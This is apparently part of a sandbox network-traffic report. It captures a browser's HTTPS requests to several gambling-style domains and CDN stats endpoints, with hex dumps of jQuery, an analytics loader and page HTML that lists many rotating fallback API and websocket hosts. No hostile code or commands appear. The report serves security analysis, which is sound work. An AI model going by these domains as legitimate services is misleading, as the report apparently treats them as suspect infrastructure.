                                                                                                                                                          Data Ascii: ndingClientRect();return{x:i.left-r.left-e.x,y:i.top-r.top-e.y}}function Q(t){return nt(t.x)||nt(t.y)}function tt(t){return{x:nt(t.x)?t.x:window.pageXOffset,y:nt(t.y)?t.y:window.pageYOffset}}function et(t){return{x:nt(t.x)?t.x:0,y:nt(t.y)?t.y:0}}function


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          129192.168.2.54986990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:53 UTC534OUTGET /pc/lib/jquery.min-1.9.1.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:54 UTC645INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:54 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 92630
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 31 Jan 2018 01:18:42 GMT
                                                                                                                                                          ETag: "5a711972-169d6"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[4],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE9[467],EU-GER-frankfurt-GLOBAL1-CACHE1[424,TCP_MISS,465],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 15238dd7b6f6f7a732c5afbf3024257f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814485
                                                                                                                                                          X-CCDN-Expires: 2400462
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:54 UTC15739INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 31 2e 39 2e 31 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 32 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 2f 2f 40 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 6a 71 75 65 72 79 2e 6d 69 6e 2e 6d 61 70 0a 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 69 3d 74 79 70 65 6f 66 20 74 2c 6f 3d 65 2e 64 6f 63 75 6d 65 6e 74 2c 61 3d 65 2e 6c 6f 63 61 74 69 6f 6e 2c 73 3d 65 2e 6a 51 75 65 72 79 2c 75 3d 65 2e 24 2c 6c 3d 7b 7d 2c 63 3d 5b 5d 2c 70 3d 22 31 2e 39 2e 31 22 2c 66 3d 63 2e 63 6f 6e 63 61 74 2c 64 3d 63 2e 70 75 73 68 2c 68 3d 63 2e 73 6c 69 63 65 2c 67 3d 63 2e 69 6e 64 65 78 4f
                                                                                                                                                          Data Ascii: /*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license//@ sourceMappingURL=jquery.min.map*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexO
                                                                                                                                                          2024-06-09 22:40:54 UTC16384INData Raw: 74 22 3d 3d 74 79 70 65 6f 66 20 65 3f 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 64 61 74 61 28 74 68 69 73 2c 65 29 7d 29 3a 62 2e 61 63 63 65 73 73 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 74 3f 6f 3f 57 28 6f 2c 65 2c 62 2e 64 61 74 61 28 6f 2c 65 29 29 3a 6e 75 6c 6c 3a 28 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 64 61 74 61 28 74 68 69 73 2c 65 2c 6e 29 7d 29 2c 74 29 7d 2c 6e 75 6c 6c 2c 6e 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 2c 6e 75 6c 6c 2c 21 30 29 7d 2c 72 65 6d 6f 76 65 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 72 65 6d 6f 76
                                                                                                                                                          Data Ascii: t"==typeof e?this.each(function(){b.data(this,e)}):b.access(this,function(n){return n===t?o?W(o,e,b.data(o,e)):null:(this.each(function(){b.data(this,e,n)}),t)},null,n,arguments.length>1,null,!0)},removeData:function(e){return this.each(function(){b.remov
                                                                                                                                                          2024-06-09 22:40:54 UTC16384INData Raw: 54 79 70 65 3a 74 2c 62 69 6e 64 54 79 70 65 3a 74 2c 68 61 6e 64 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 72 3d 74 68 69 73 2c 69 3d 65 2e 72 65 6c 61 74 65 64 54 61 72 67 65 74 2c 6f 3d 65 2e 68 61 6e 64 6c 65 4f 62 6a 3b 0a 72 65 74 75 72 6e 28 21 69 7c 7c 69 21 3d 3d 72 26 26 21 62 2e 63 6f 6e 74 61 69 6e 73 28 72 2c 69 29 29 26 26 28 65 2e 74 79 70 65 3d 6f 2e 6f 72 69 67 54 79 70 65 2c 6e 3d 6f 2e 68 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 2c 65 2e 74 79 70 65 3d 74 29 2c 6e 7d 7d 7d 29 2c 62 2e 73 75 70 70 6f 72 74 2e 73 75 62 6d 69 74 42 75 62 62 6c 65 73 7c 7c 28 62 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2e 73 75 62 6d 69 74 3d 7b 73 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                          Data Ascii: Type:t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,o=e.handleObj;return(!i||i!==r&&!b.contains(r,i))&&(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),b.support.submitBubbles||(b.event.special.submit={setup:function()
                                                                                                                                                          2024-06-09 22:40:54 UTC16384INData Raw: 6e 5d 7d 29 2c 65 76 65 6e 3a 70 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 30 3b 66 6f 72 28 3b 74 3e 6e 3b 6e 2b 3d 32 29 65 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 6f 64 64 3a 70 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 31 3b 66 6f 72 28 3b 74 3e 6e 3b 6e 2b 3d 32 29 65 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 6c 74 3a 70 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 30 3e 6e 3f 6e 2b 74 3a 6e 3b 66 6f 72 28 3b 2d 2d 72 3e 3d 30 3b 29 65 2e 70 75 73 68 28 72 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 67 74 3a 70 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 30 3e 6e 3f 6e 2b 74 3a 6e 3b 66 6f 72 28 3b 74 3e 2b 2b 72 3b
                                                                                                                                                          Data Ascii: n]}),even:pt(function(e,t){var n=0;for(;t>n;n+=2)e.push(n);return e}),odd:pt(function(e,t){var n=1;for(;t>n;n+=2)e.push(n);return e}),lt:pt(function(e,t,n){var r=0>n?n+t:n;for(;--r>=0;)e.push(r);return e}),gt:pt(function(e,t,n){var r=0>n?n+t:n;for(;t>++r;
                                                                                                                                                          2024-06-09 22:40:54 UTC16384INData Raw: 74 65 20 6c 5b 6f 5d 2c 70 3f 64 65 6c 65 74 65 20 6e 5b 75 5d 3a 74 79 70 65 6f 66 20 6e 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 21 3d 3d 69 3f 6e 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 75 29 3a 6e 5b 75 5d 3d 6e 75 6c 6c 2c 63 2e 70 75 73 68 28 6f 29 29 7d 7d 7d 29 3b 76 61 72 20 50 74 2c 52 74 2c 57 74 2c 24 74 3d 2f 61 6c 70 68 61 5c 28 5b 5e 29 5d 2a 5c 29 2f 69 2c 49 74 3d 2f 6f 70 61 63 69 74 79 5c 73 2a 3d 5c 73 2a 28 5b 5e 29 5d 2a 29 2f 2c 7a 74 3d 2f 5e 28 74 6f 70 7c 72 69 67 68 74 7c 62 6f 74 74 6f 6d 7c 6c 65 66 74 29 24 2f 2c 58 74 3d 2f 5e 28 6e 6f 6e 65 7c 74 61 62 6c 65 28 3f 21 2d 63 5b 65 61 5d 29 2e 2b 29 2f 2c 55 74 3d 2f 5e 6d 61 72 67 69 6e 2f 2c 56 74 3d 52 65 67 45 78 70 28 22 5e 28 22 2b 78 2b 22 29 28 2e 2a
                                                                                                                                                          Data Ascii: te l[o],p?delete n[u]:typeof n.removeAttribute!==i?n.removeAttribute(u):n[u]=null,c.push(o))}}});var Pt,Rt,Wt,$t=/alpha\([^)]*\)/i,It=/opacity\s*=\s*([^)]*)/,zt=/^(top|right|bottom|left)$/,Xt=/^(none|table(?!-c[ea]).+)/,Ut=/^margin/,Vt=RegExp("^("+x+")(.*
                                                                                                                                                          2024-06-09 22:40:54 UTC11355INData Raw: 6e 63 74 69 6f 6e 20 49 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 65 2e 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 7d 63 61 74 63 68 28 74 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 7a 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 65 2e 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 7d 62 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 3d 65 2e 41 63 74 69 76 65 58 4f 62 6a 65 63 74 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 74 68 69 73 2e 69 73 4c 6f 63 61 6c 26 26 49 6e 28 29 7c 7c 7a 6e 28 29 7d 3a 49 6e 2c 52 6e 3d 62 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 28 29 2c 62 2e 73 75 70 70 6f 72 74 2e 63 6f 72 73 3d 21 21
                                                                                                                                                          Data Ascii: nction In(){try{return new e.XMLHttpRequest}catch(t){}}function zn(){try{return new e.ActiveXObject("Microsoft.XMLHTTP")}catch(t){}}b.ajaxSettings.xhr=e.ActiveXObject?function(){return!this.isLocal&&In()||zn()}:In,Rn=b.ajaxSettings.xhr(),b.support.cors=!!


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          130192.168.2.549870170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:54 UTC420OUTGET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=hg679.cc&terminal=1&r=6412591773 HTTP/1.1
                                                                                                                                                          Host: ahd-ocssn.qqxgo.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:55 UTC507INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:55 GMT
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: aliyungf_tc=3de529fcf893d6d3ee212d9780b2d6d818dae7d7247c306b9d3885f4ac9f9c38; Path=/; HttpOnly
                                                                                                                                                          Server: Tengine/2.3.0
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          api-elapsed: 7
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:40:55 UTC1130INData Raw: 34 36 33 0d 0a 7b 22 61 6e 61 6c 79 74 69 63 73 43 6f 64 65 22 3a 22 28 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 2c 20 64 2c 20 65 2c 20 6a 2c 20 73 29 20 7b 20 20 20 20 20 20 20 20 20 61 5b 64 5d 20 3d 20 61 5b 64 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 20 20 20 20 20 20 20 20 20 20 20 20 28 61 5b 64 5d 2e 61 20 3d 20 61 5b 64 5d 2e 61 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 20 20 20 20 20 20 20 20 20 7d 3b 20 20 20 20 20 20 20 20 20 6a 20 3d 20 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 29 2c 20 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 63 29 5b 30 5d 3b 20 20 20 20 20 20 20 20 20 6a 2e 61 73 79 6e 63 20 3d 20 74 72 75 65
                                                                                                                                                          Data Ascii: 463{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true
                                                                                                                                                          2024-06-09 22:40:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          131192.168.2.549873163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:54 UTC459OUTGET /lt-cloud/stat.do?pv=ajax&pa=host.info&domain=xpj723.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972850573425 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:54 UTC548INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:54 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          api-elapsed: 10
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache29.l2hk3[32,0], cache26.l2sg3[68,0], ens-cache3.de5[254,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b55c9717179728544093996e
                                                                                                                                                          2024-06-09 22:40:54 UTC2752INData Raw: 61 62 39 0d 0a 7b 22 61 6e 61 6c 79 74 69 63 73 43 6f 64 65 22 3a 22 28 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 2c 20 64 2c 20 65 2c 20 6a 2c 20 73 29 20 7b 20 20 20 20 20 20 20 20 20 61 5b 64 5d 20 3d 20 61 5b 64 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 20 20 20 20 20 20 20 20 20 20 20 20 28 61 5b 64 5d 2e 61 20 3d 20 61 5b 64 5d 2e 61 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 20 20 20 20 20 20 20 20 20 7d 3b 20 20 20 20 20 20 20 20 20 6a 20 3d 20 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 29 2c 20 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 63 29 5b 30 5d 3b 20 20 20 20 20 20 20 20 20 6a 2e 61 73 79 6e 63 20 3d 20 74 72 75 65
                                                                                                                                                          Data Ascii: ab9{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true
                                                                                                                                                          2024-06-09 22:40:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          132192.168.2.549871202.61.87.2244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:54 UTC699OUTGET /default.html HTTP/1.1
                                                                                                                                                          Host: xpj723.cc
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: com_env=p
                                                                                                                                                          2024-06-09 22:40:54 UTC404INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:54 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 35313
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Last-Modified: Fri, 18 Aug 2023 04:30:01 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          ETag: "64def3c9-89f1"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: MISS
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:54 UTC15980INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 2e 69 6e 69 74 2d 69 70 2d 62 6c 6f 63 6b 7b 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 74 6f 70 3a 20 30 3b 6c 65 66 74 3a 20 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head> <meta charset=utf-8> <meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"> <title></title> <style> .init-ip-block{position: fixed;top: 0;left: 0;background-color
                                                                                                                                                          2024-06-09 22:40:54 UTC16384INData Raw: 20 20 22 77 73 73 61 2d 33 36 31 2e 69 78 69 61 6f 73 68 69 7a 69 2e 63 6f 6d 3a 31 37 38 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 77 73 73 61 2d 33 35 31 2e 74 61 69 6a 75 65 74 61 69 71 75 61 6e 64 61 6f 2e 63 6f 6d 3a 31 36 38 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 31 39 36 32 2e 77 77 77 62 79 66 65 6e 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 31 39 36 32 2e 68 79 64 71 65 66 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 2d 61 77 73 2e 62 61 6b 65 64 64 6f 76 65 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 2d 61 6b 61 2e 62 6c 61 63 6b 6b 68 61 6b 69 39 31 38 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20
                                                                                                                                                          Data Ascii: "wssa-361.ixiaoshizi.com:1785", "wssa-351.taijuetaiquandao.com:1685", "ocsapi1962.wwwbyfen.com", "ocsapi1962.hydqef.com", "ocsapi-aws.bakeddove.com", "ocsapi-aka.blackkhaki918.com",
                                                                                                                                                          2024-06-09 22:40:54 UTC2949INData Raw: 2f 20 72 61 74 69 6f 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 61 6e 67 65 2e 62 6f 74 74 6f 6d 20 3d 20 4d 61 74 68 2e 63 65 69 6c 28 28 74 6f 70 20 2b 20 62 74 6e 48 29 20 2f 20 72 61 74 69 6f 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 6e 76 61 73 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 69 67 68 74 20 3d 20 4d 61 74 68 2e 63 65 69 6c 28 63 61 6e 76 61 73 2e 77 69 64 74 68 20 2f 20 32 20 2b 20 62 74 6e 57 20 2f 20 32 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 66 66 73 65 74 58 20 3d 20 65 2e 6f 66 66 73 65 74 58 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f
                                                                                                                                                          Data Ascii: / ratio) range.bottom = Math.ceil((top + btnH) / ratio) canvas.addEventListener('click', function (e) { var right = Math.ceil(canvas.width / 2 + btnW / 2) var offsetX = e.offsetX var o


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          133192.168.2.549874183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:54 UTC548OUTGET /ftl/commonPage/js/websocket/PopUp.js HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:54 UTC706INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 797
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-HUZ-MP-02-16
                                                                                                                                                          ETag: W/"6260ddd4-828"
                                                                                                                                                          Date: Thu, 06 Jun 2024 12:05:11 GMT
                                                                                                                                                          Last-Modified: Thu, 21 Apr 2022 04:30:12 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 12:05:11 GMT
                                                                                                                                                          Age: 297343
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;huzmp02:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-HUZ-MP-02-16
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-04
                                                                                                                                                          X-Cdn-Request-ID: 7508591a622e05b970145fcce95f727c
